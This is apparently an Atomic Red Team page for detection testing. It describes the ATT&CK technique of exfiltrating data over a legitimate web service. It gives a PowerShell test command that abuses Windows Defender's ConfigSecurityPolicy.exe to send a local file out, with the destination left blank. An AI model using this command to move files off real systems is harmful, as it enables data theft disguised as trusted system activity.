Try it using Invoke-Atomic

Exfiltration Over Web Service

Description from ATT&CK

Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Atomic Tests

Atomic Test #1 - Data Exfiltration with ConfigSecurityPolicy

Exfiltration of data using ConfigSecurityPolicy.exe

Supported Platforms: windows

auto_generated_guid: 5568a8f4-a8b1-4c40-9399-4969b642f122



Attack Commands: Run with powershell!

$path = resolve-path "c:\ProgramData\Microsoft\Windows Defender\Platform\*\ConfigSecurityPolicy.exe"
& $path[0] c:\temp\config.xml ""